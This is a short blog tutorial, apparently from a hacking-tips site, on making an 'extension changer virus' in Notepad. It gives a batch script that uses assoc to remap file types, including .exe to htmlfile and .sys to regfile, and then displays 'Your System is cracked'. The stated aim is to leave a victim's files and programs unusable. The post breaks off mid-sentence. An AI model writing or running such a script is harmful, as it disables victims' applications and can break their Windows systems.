Posts

Showing posts with the label Notepad

HOW TO MAKE EXTENSION CHANGER VIRUS USING NOTEPAD

Image
HOW TO MAKE EXTENSION CHANGER VIRUS USING NOTEPAD In this article i am gonna show you how to make a virus that changes extension of  files.Even  though it is not a harmful virus it will change all the files extension and makes it unuseful for the user and he has to again change the files extension to its orginal one. What is Extension changer ? Assume that all images (*.jpeg, Gif etc) are by default opening with “Windows Picture and Fax Viewer” but in with this virus,this will change to some other application as you wish for ex: .mpeg application so that it cannot be opened in this way you can disable opening of jpeg application. HOW TO MAKE EXTENSION CHANGER VIRUS 1. Open a Notepad and copy and paste the below code @echo off assoc .txt=jpegfile assoc .exe=htmlfile assoc .jpeg=avifile assoc .png=mpegfile assoc .mpeg=txtfile assoc .sys=regfile msg Your System is cracked ….. exit Save it as  anyname.bat , and now your virus file is re...